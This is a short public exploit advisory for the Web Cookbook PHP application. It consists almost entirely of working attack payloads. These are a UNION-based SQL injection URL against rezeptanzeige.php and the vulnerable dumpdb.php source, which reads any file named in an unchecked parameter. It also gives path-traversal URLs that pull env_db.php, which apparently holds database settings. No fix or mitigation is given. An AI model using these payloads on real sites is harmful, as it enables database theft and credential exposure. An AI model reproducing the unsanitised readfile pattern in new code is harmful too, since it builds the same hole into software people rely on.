Web Cookbook Multiple Vulnerability

# Web Cookbook Multiple Vulnerability # By cr4wl3r http://bastardlabs.info # Script: http://sourceforge.net/projects/webcookbook/ # Tested: Win 7 # Proof of Concept # SQL Injection http://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi] http://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10-- # Remote File Disclosure # Bugs found /admin/dumpdb.php -------------------------- 1 <?php 2 $outfile = $_GET['outfile']; 3 header("Content-Type: text/plain"); 4 header("Content-length: " . filesize("../upload/" . $outfile)); 5 header("Content-Disposition: attachment; filename=" . $outfile); 6 readfile("../upload/" . $outfile); 7 ?> -------------------------- http://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file] http://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php # Demo: http://bastardlabs.info/demo/WebCookbook1.png http://bastardlabs.info/demo/WebCookbook2.png